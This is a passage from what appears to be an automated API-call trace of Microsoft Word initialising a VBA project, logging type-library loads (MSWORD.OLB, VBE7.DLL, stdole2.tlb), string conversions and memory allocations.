_Buffer=0x2e649a, _BufferCount=0x10, _Radix=16 | out: _Buffer="8") returned 0x0 [0030.438] _ultow_s (in: _Value=0x7, _Buffer=0x2e649e, _BufferCount=0xe, _Radix=16 | out: _Buffer="7") returned 0x0 [0030.438] _ultow_s (in: _Value=0x0, _Buffer=0x2e64a2, _BufferCount=0xc, _Radix=16 | out: _Buffer="0") returned 0x0 [0030.438] wcscpy_s (in: _Destination=0x7822c38, _SizeInWords=0x8e, _Source="*\\G" | out: _Destination="*\\G") returned 0x0 [0030.438] wcscpy_s (in: _Destination=0x7822c3e, _SizeInWords=0x8b, _Source="{00020905-0000-0000-C000-000000000046}" | out: _Destination="{00020905-0000-0000-C000-000000000046}") returned 0x0 [0030.438] wcscpy_s (in: _Destination=0x7822c8a, _SizeInWords=0x65, _Source="#8.7#0#" | out: _Destination="#8.7#0#") returned 0x0 [0030.438] wcscpy_s (in: _Destination=0x7822c98, _SizeInWords=0x5e, _Source="C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB" | out: _Destination="C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB") returned 0x0 [0030.438] wcscpy_s (in: _Destination=0x7822d0e, _SizeInWords=0x23, _Source="Microsoft Word 16.0 Object Library" | out: _Destination="Microsoft Word 16.0 Object Library") returned 0x0 [0030.438] ITypeLib:LocalReleaseTLibAttr (This=0x731da90) returned 0x0 [0030.438] wcscpy_s (in: _Destination=0x754cc90, _SizeInWords=0x8e, _Source="*\\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library" | out: _Destination="*\\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library") returned 0x0 [0030.438] ITypeLib:RemoteGetDocumentation (in: This=0x731da90, index=-1, refPtrFlags=0x2e6648, pBstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x4 | out: pBstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x4) returned 0x0 [0030.438] SysStringLen (param_1="Word") returned 0x4 [0030.438] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Word", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0030.438] SysStringLen (param_1="Word") returned 0x4 [0030.438] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Word", cchWideChar=5, lpMultiByteStr=0x7742fc8, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Word", lpUsedDefaultChar=0x0) returned 5 [0030.438] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Word") returned 0x106bb5 [0030.438] strcpy_s (in: _Dst=0x2e6440, _DstSize=0x5, _Src="Word" | out: _Dst="Word") returned 0x0 [0030.438] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e6440, cbMultiByte=5, lpWideCharStr=0x2e6290, cchWideChar=5 | out: lpWideCharStr="Word") returned 5 [0030.438] wcsncpy_s (in: _Destination=0x2e6240, _SizeInWords=0x108, _Source="*\\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library", _MaxCount=0x106 | out: _Destination="*\\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library") returned 0x0 [0030.438] CharLowerBuffW (in: lpsz="*\\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library", cchLength=0x8d | out: lpsz="*\\g{00020905-0000-0000-c000-000000000046}#8.7#0#c:\\program files\\microsoft office\\root\\office16\\msword.olb#microsoft word 16.0 object library") returned 0x8d [0030.438] IMalloc:Alloc (This=0x7fefe015380, cb=0x11c) returned 0x77a0c80 [0030.438] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\g{00020905-0000-0000-c000-000000000046}#8.7#0#c:\\program files\\microsoft office\\root\\office16\\msword.olb#microsoft word 16.0 object library", cchWideChar=142, lpMultiByteStr=0x77a0c80, cbMultiByte=284, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\g{00020905-0000-0000-c000-000000000046}#8.7#0#c:\\program files\\microsoft office\\root\\office16\\msword.olb#microsoft word 16.0 object library", lpUsedDefaultChar=0x0) returned 142 [0030.438] IMalloc:Free (This=0x7fefe015380, pv=0x77a0c80) [0030.438] _wcsicmp (_String1="*\\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library", _String2="*\\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library") returned 0 [0030.438] wcsncpy_s (in: _Destination=0x2e6240, _SizeInWords=0x108, _Source="*\\Z085b6852dd", _MaxCount=0x106 | out: _Destination="*\\Z085b6852dd") returned 0x0 [0030.438] CharLowerBuffW (in: lpsz="*\\Z085b6852dd", cchLength=0xd | out: lpsz="*\\z085b6852dd") returned 0xd [0030.439] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\z085b6852dd", cchWideChar=14, lpMultiByteStr=0x2e6170, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\z085b6852dd", lpUsedDefaultChar=0x0) returned 14 [0030.439] _wcsicmp (_String1="*\\Z085b6852dd", _String2="*\\Z085b6852dd") returned 0 [0030.439] IUnknown:AddRef (This=0x731da90) returned 0x5 [0030.439] IUnknown:QueryInterface (in: This=0x731da90, riid=0x7fee3a764b8*(Data1=0xcacc1e8a, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e6668 | out: ppvObject=0x2e6668*=0x0) returned 0x80004002 [0030.439] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Word", cchWideChar=5, lpMultiByteStr=0x2e6630, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Word", lpUsedDefaultChar=0x0) returned 5 [0030.439] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Word") returned 0x106bb5 [0030.439] IUnknown:Release (This=0x731da90) returned 0x4 [0030.439] IUnknown:AddRef (This=0x782a220) returned 0x3 [0030.439] ITypeLib:RemoteGetDocumentation (in: This=0x782a220, index=-1, refPtrFlags=0x2e6748, pBstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0 | out: pBstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0) returned 0x0 [0030.439] IUnknown:QueryInterface (in: This=0x782a220, riid=0x7fee3a76290*(Data1=0xcacc1e84, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e6538 | out: ppvObject=0x2e6538*=0x0) returned 0x80004002 [0030.439] ITypeLib:RemoteGetLibAttr (in: This=0x782a220, ppTLibAttr=0x2e6530, pDummy=0x10 | out: ppTLibAttr=0x2e6530, pDummy=0x10) returned 0x0 [0030.439] ITypeLib:RemoteGetDocumentation (in: This=0x782a220, index=-1, refPtrFlags=0x0, pBstrName=0x2e6528, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x1760260365a4 | out: pBstrName=0x2e6528*="Visual Basic For Applications", pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x1760260365a4) returned 0x0 [0030.439] StringFromGUID2 (in: rguid=0x7667e30*(Data1=0x204ef, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), lpsz=0x2e6550, cchMax=39 | out: lpsz="{000204EF-0000-0000-C000-000000000046}") returned 39 [0030.439] _ultow_s (in: _Value=0x4, _Buffer=0x2e649a, _BufferCount=0x10, _Radix=16 | out: _Buffer="4") returned 0x0 [0030.439] _ultow_s (in: _Value=0x2, _Buffer=0x2e649e, _BufferCount=0xe, _Radix=16 | out: _Buffer="2") returned 0x0 [0030.439] _ultow_s (in: _Value=0x9, _Buffer=0x2e64a2, _BufferCount=0xc, _Radix=16 | out: _Buffer="9") returned 0x0 [0030.439] wcscpy_s (in: _Destination=0x7822c38, _SizeInWords=0x91, _Source="*\\G" | out: _Destination="*\\G") returned 0x0 [0030.439] wcscpy_s (in: _Destination=0x7822c3e, _SizeInWords=0x8e, _Source="{000204EF-0000-0000-C000-000000000046}" | out: _Destination="{000204EF-0000-0000-C000-000000000046}") returned 0x0 [0030.439] wcscpy_s (in: _Destination=0x7822c8a, _SizeInWords=0x68, _Source="#4.2#9#" | out: _Destination="#4.2#9#") returned 0x0 [0030.439] wcscpy_s (in: _Destination=0x7822c98, _SizeInWords=0x61, _Source="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL" | out: _Destination="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL") returned 0x0 [0030.439] wcscpy_s (in: _Destination=0x7822d1e, _SizeInWords=0x1e, _Source="Visual Basic For Applications" | out: _Destination="Visual Basic For Applications") returned 0x0 [0030.439] ITypeLib:LocalReleaseTLibAttr (This=0x782a220) returned 0x0 [0030.439] wcscpy_s (in: _Destination=0x777ad88, _SizeInWords=0x91, _Source="*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications" | out: _Destination="*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications") returned 0x0 [0030.439] ITypeLib:RemoteGetDocumentation (in: This=0x782a220, index=-1, refPtrFlags=0x2e6648, pBstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x3 | out: pBstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x3) returned 0x0 [0030.439] SysStringLen (param_1="VBA") returned 0x3 [0030.439] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBA", cchWideChar=3, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 3 [0030.439] SysStringLen (param_1="VBA") returned 0x3 [0030.439] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBA", cchWideChar=4, lpMultiByteStr=0x7667f28, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBA", lpUsedDefaultChar=0x0) returned 4 [0030.439] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VBA") returned 0x10e2f7 [0030.439] strcpy_s (in: _Dst=0x2e6440, _DstSize=0x4, _Src="VBA" | out: _Dst="VBA") returned 0x0 [0030.439] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e6440, cbMultiByte=4, lpWideCharStr=0x2e6290, cchWideChar=4 | out: lpWideCharStr="VBA") returned 4 [0030.439] IUnknown:AddRef (This=0x731da90) returned 0x5 [0030.439] ITypeLib:RemoteIsName (in: This=0x731da90, szNameBuf="VBA", lHashVal=0x10e2f7, pfName=0x2e6360, pBstrLibName=0x2e6290 | out: pfName=0x2e6360*=0, pBstrLibName=0x2e6290) returned 0x0 [0030.440] IUnknown:Release (This=0x731da90) returned 0x4 [0030.440] IMalloc:Alloc (This=0x7fefe015380, cb=0xc) returned 0xb490cf0 [0030.440] IMalloc:Free (This=0x7fefe015380, pv=0x7667b90) [0030.440] IMalloc:Alloc (This=0x7fefe015380, cb=0x20) returned 0x7667b90 [0030.440] IMalloc:Free (This=0x7fefe015380, pv=0xb490cf0) [0030.440] wcsncpy_s (in: _Destination=0x2e6240, _SizeInWords=0x108, _Source="*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications", _MaxCount=0x106 | out: _Destination="*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications") returned 0x0 [0030.440] CharLowerBuffW (in: lpsz="*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications", cchLength=0x90 | out: lpsz="*\\g{000204ef-0000-0000-c000-000000000046}#4.2#9#c:\\program files\\common files\\microsoft shared\\vba\\vba7.1\\vbe7.dll#visual basic for applications") returned 0x90 [0030.440] IMalloc:Alloc (This=0x7fefe015380, cb=0x122) returned 0x77a0c80 [0030.440] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\g{000204ef-0000-0000-c000-000000000046}#4.2#9#c:\\program files\\common files\\microsoft shared\\vba\\vba7.1\\vbe7.dll#visual basic for applications", cchWideChar=145, lpMultiByteStr=0x77a0c80, cbMultiByte=290, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\g{000204ef-0000-0000-c000-000000000046}#4.2#9#c:\\program files\\common files\\microsoft shared\\vba\\vba7.1\\vbe7.dll#visual basic for applications", lpUsedDefaultChar=0x0) returned 145 [0030.440] IMalloc:Free (This=0x7fefe015380, pv=0x77a0c80) [0030.440] _wcsicmp (_String1="*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications", _String2="*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications") returned 0 [0030.440] wcsncpy_s (in: _Destination=0x2e6240, _SizeInWords=0x108, _Source="*\\Z085b6852dd", _MaxCount=0x106 | out: _Destination="*\\Z085b6852dd") returned 0x0 [0030.440] CharLowerBuffW (in: lpsz="*\\Z085b6852dd", cchLength=0xd | out: lpsz="*\\z085b6852dd") returned 0xd [0030.440] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\z085b6852dd", cchWideChar=14, lpMultiByteStr=0x2e6170, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\z085b6852dd", lpUsedDefaultChar=0x0) returned 14 [0030.440] _wcsicmp (_String1="*\\Z085b6852dd", _String2="*\\Z085b6852dd") returned 0 [0030.440] IUnknown:AddRef (This=0x782a220) returned 0x4 [0030.440] IUnknown:QueryInterface (in: This=0x782a220, riid=0x7fee3a764b8*(Data1=0xcacc1e8a, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e6668 | out: ppvObject=0x2e6668*=0x0) returned 0x80004002 [0030.440] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBA", cchWideChar=4, lpMultiByteStr=0x2e6630, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBA", lpUsedDefaultChar=0x0) returned 4 [0030.440] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VBA") returned 0x10e2f7 [0030.440] IMalloc:Alloc (This=0x7fefe015380, cb=0x0) returned 0xb4f6250 [0030.440] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f6250) returned 0x0 [0030.440] IMalloc:Alloc (This=0x7fefe015380, cb=0x0) returned 0xb4f6240 [0030.440] IMalloc:GetSize (This=0x7fefe015380, pv=0xb4f6240) returned 0x0 [0030.440] IMalloc:Alloc (This=0x7fefe015380, cb=0x0) returned 0xb4f6260 [0030.440] qsort (in: _Base=0xb4f6260, _NumOfElements=0x0, _SizeOfElements=0x10, _PtFuncCompare=0x7fee383db70 | out: _Base=0xb4f6260) [0030.440] IMalloc:Free (This=0x7fefe015380, pv=0xb4f6260) [0030.440] IMalloc:Alloc (This=0x7fefe015380, cb=0x18) returned 0xb490cf0 [0030.440] IMalloc:Alloc (This=0x7fefe015380, cb=0xc) returned 0xb490b10 [0030.440] IMalloc:GetSize (This=0x7fefe015380, pv=0xb490b10) returned 0xc [0030.440] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Win16") returned 0x107ec1 [0030.440] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Win32") returned 0x107f07 [0030.440] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Win64") returned 0x107f78 [0030.440] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Mac") returned 0x10b2b3 [0030.440] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VBA6") returned 0x1023ad [0030.440] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VBA7") returned 0x1023ae [0030.440] IMalloc:Free (This=0x7fefe015380, pv=0xb4f6240) [0030.440] IMalloc:Free (This=0x7fefe015380, pv=0xb4f6250) [0030.440] CoCreateGuid (in: pguid=0x2e6d18 | out: pguid=0x2e6d18*(Data1=0xa101b5aa, Data2=0x2644, Data3=0x49c6, Data4=([0]=0x99, [1]=0x8a, [2]=0x3a, [3]=0xd6, [4]=0x64, [5]=0xc7, [6]=0xd, [7]=0xe8))) returned 0x0 [0030.441] IMalloc:Alloc (This=0x7fefe015380, cb=0x6b0) returned 0xb52ba80 [0030.441] CoCreateGuid (in: pguid=0x7803108 | out: pguid=0x7803108*(Data1=0xc6eb9af, Data2=0x57ab, Data3=0x4f52, Data4=([0]=0xb1, [1]=0xa7, [2]=0x76, [3]=0xbf, [4]=0x73, [5]=0xc9, [6]=0xb4, [7]=0x90))) returned 0x0 [0030.441] strcpy_s (in: _Dst=0x7803168, _DstSize=0x1, _Src="" | out: _Dst="") returned 0x0 [0030.441] LoadStringA (in: hInstance=0x7fef1850000, uID=0x32f3, lpBuffer=0x93bcf98, cchBufferMax=128 | out: lpBuffer="Project") returned 0x7 [0030.449] wsprintfA (in: param_1=0x93bcf9f, param_2="%d" | out: param_1="1") returned 1 [0030.449] SysStringByteLen (bstr="牐橯捥t") returned 0x7 [0030.449] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7667f28, cbMultiByte=7, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0030.449] SysStringByteLen (bstr="牐橯捥t") returned 0x7 [0030.449] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7667f28, cbMultiByte=8, lpWideCharStr=0x7667e38, cchWideChar=8 | out: lpWideCharStr="Project") returned 8 [0030.449] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Project", cchWideChar=-1, lpMultiByteStr=0x2e7900, cbMultiByte=129, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Project", lpUsedDefaultChar=0x0) returned 8 [0030.449] lstrlenA (lpString="Project") returned 7 [0030.449] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x93bcf98, cbMultiByte=-1, lpWideCharStr=0x2e79f0, cchWideChar=9 | out: lpWideCharStr="Project1") returned 9 [0030.449] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Project1", cchWideChar=9, lpMultiByteStr=0x2e78e0, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Project1", lpUsedDefaultChar=0x0) returned 9 [0030.449] lstrcmpiA (lpString1="", lpString2="Project1") returned -1 [0030.449] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Project1", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0030.449] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Project1", cchWideChar=-1, lpMultiByteStr=0x2e77e0, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Project1", lpUsedDefaultChar=0x0) returned 9 [0030.449] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Project1") returned 0x10170a [0030.449] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Project1", cchWideChar=9, lpMultiByteStr=0x2e76f0, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Project1", lpUsedDefaultChar=0x0) returned 9 [0030.449] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Project1") returned 0x10170a [0030.449] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Project1", cchWideChar=9, lpMultiByteStr=0x2e76f0, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Project1", lpUsedDefaultChar=0x0) returned 9 [0030.449] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Project1", cchWideChar=9, lpMultiByteStr=0x2e75b0, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Project1", lpUsedDefaultChar=0x0) returned 9 [0030.450] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Project1") returned 0x10170a [0030.450] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Project1") returned 0x10170a [0030.450] IMalloc:Alloc (This=0x7fefe015380, cb=0x18) returned 0xb490a90 [0030.450] IMalloc:Free (This=0x7fefe015380, pv=0x7667b90) [0030.450] IMalloc:Alloc (This=0x7fefe015380, cb=0x20) returned 0x7667b90 [0030.450] IMalloc:Free (This=0x7fefe015380, pv=0xb490a90) [0030.450] wcsncpy_s (in: _Destination=0x2e73b0, _SizeInWords=0x108, _Source="*\\Z085b6852dd", _MaxCount=0x106 | out: _Destination="*\\Z085b6852dd") returned 0x0 [0030.450] CharLowerBuffW (in: lpsz="*\\Z085b6852dd", cchLength=0xd | out: lpsz="*\\z085b6852dd") returned 0xd [0030.450] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\z085b6852dd", cchWideChar=14, lpMultiByteStr=0x2e72e0, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\z085b6852dd", lpUsedDefaultChar=0x0) returned 14 [0030.450] _wcsicmp (_String1="*\\Z085b6852dd", _String2="*\\Z085b6852dd") returned 0 [0030.450] strcpy_s (in: _Dst=0x7803178, _DstSize=0x9, _Src="Project1" | out: _Dst="Project1") returned 0x0 [0030.450] SysStringByteLen (bstr="牐橯捥ㅴ") returned 0x8 [0030.450] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7667f28, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0030.450] SysStringByteLen (bstr="牐橯捥ㅴ") returned 0x8 [0030.450] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7667f28, cbMultiByte=9, lpWideCharStr=0x7667e38, cchWideChar=9 | out: lpWideCharStr="Project1") returned 9 [0030.450] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Project1", cchWideChar=-1, lpMultiByteStr=0x2e7810, cbMultiByte=128, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Project1", lpUsedDefaultChar=0x0) returned 9 [0030.450] lstrlenA (lpString="Project1") returned 8 [0030.452] lstrlenA (lpString="C:\\Windows\\system32\\stdole2.tlb") returned 31 [0030.452] lstrcpyA (in: lpString1=0x93b7ca0, lpString2="C:\\Windows\\system32\\stdole2.tlb" | out: lpString1="C:\\Windows\\system32\\stdole2.tlb") returned="C:\\Windows\\system32\\stdole2.tlb" [0030.452] LoadTypeLib (in: szFile="C:\\Windows\\system32\\stdole2.tlb", pptlib=0x2e78c8*=0x0 | out: pptlib=0x2e78c8*=0x731cc80) returned 0x0 [0030.453] LoadTypeLib (in: szFile="C:\\Windows\\system32\\stdole2.tlb", pptlib=0x2e7558*=0x0 | out: pptlib=0x2e7558*=0x731cc80) returned 0x0 [0030.453] ITypeLib:RemoteGetDocumentation (in: This=0x731cc80, index=-1, refPtrFlags=0x2e7578, pBstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0 | out: pBstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0) returned 0x0 [0030.453] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="stdole", cchWideChar=7, lpMultiByteStr=0x2e7460, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="stdole", lpUsedDefaultChar=0x0) returned 7 [0030.453] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="stdole") returned 0x106093 [0030.453] IUnknown:QueryInterface (in: This=0x731cc80, riid=0x7fee3a76290*(Data1=0xcacc1e84, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e7438 | out: ppvObject=0x2e7438*=0x0) returned 0x80004002 [0030.453] GetLocalTime (in: lpSystemTime=0x2e72e0 | out: lpSystemTime=0x2e72e0*(wYear=0x7e1, wMonth=0x8, wDayOfWeek=0x4, wDay=0x11, wHour=0xd, wMinute=0x35, wSecond=0x21, wMilliseconds=0x15c)) [0030.453] wcsncpy_s (in: _Destination=0x2e6f90, _SizeInWords=0x108, _Source="*\\Z085b6852dd", _MaxCount=0x106 | out: _Destination="*\\Z085b6852dd") returned 0x0 [0030.453] CharLowerBuffW (in: lpsz="*\\Z085b6852dd", cchLength=0xd | out: lpsz="*\\z085b6852dd") returned 0xd [0030.453] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\z085b6852dd", cchWideChar=14, lpMultiByteStr=0x2e6ec0, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\z085b6852dd", lpUsedDefaultChar=0x0) returned 14 [0030.453] _wcsicmp (_String1="*\\Z085b6852dd", _String2="*\\Z085b6852dd") returned 0 [0030.453] IUnknown:QueryInterface (in: This=0x731cc80, riid=0x7fee3a76290*(Data1=0xcacc1e84, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e7368 | out: ppvObject=0x2e7368*=0x0) returned 0x80004002 [0030.453] ITypeLib:RemoteGetLibAttr (in: This=0x731cc80, ppTLibAttr=0x2e7360, pDummy=0x10 | out: ppTLibAttr=0x2e7360, pDummy=0x10) returned 0x0 [0030.453] ITypeLib:RemoteGetDocumentation (in: This=0x731cc80, index=-1, refPtrFlags=0x0, pBstrName=0x2e7358, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0 | out: pBstrName=0x2e7358*="OLE Automation", pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0) returned 0x0 [0030.453] StringFromGUID2 (in: rguid=0x7667e30*(Data1=0x20430, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), lpsz=0x2e7380, cchMax=39 | out: lpsz="{00020430-0000-0000-C000-000000000046}") returned 39 [0030.453] _ultow_s (in: _Value=0x2, _Buffer=0x2e72ca, _BufferCount=0x10, _Radix=16 | out: _Buffer="2") returned 0x0 [0030.453] _ultow_s (in: _Value=0x0, _Buffer=0x2e72ce, _BufferCount=0xe, _Radix=16 | out: _Buffer="0") returned 0x0 [0030.453] _ultow_s (in: _Value=0x0, _Buffer=0x2e72d2, _BufferCount=0xc, _Radix=16 | out: _Buffer="0") returned 0x0 [0030.453] wcscpy_s (in: _Destination=0xb4599f8, _SizeInWords=0x5f, _Source="*\\G" | out: _Destination="*\\G") returned 0x0 [0030.453] wcscpy_s (in: _Destination=0xb4599fe, _SizeInWords=0x5c, _Source="{00020430-0000-0000-C000-000000000046}" | out: 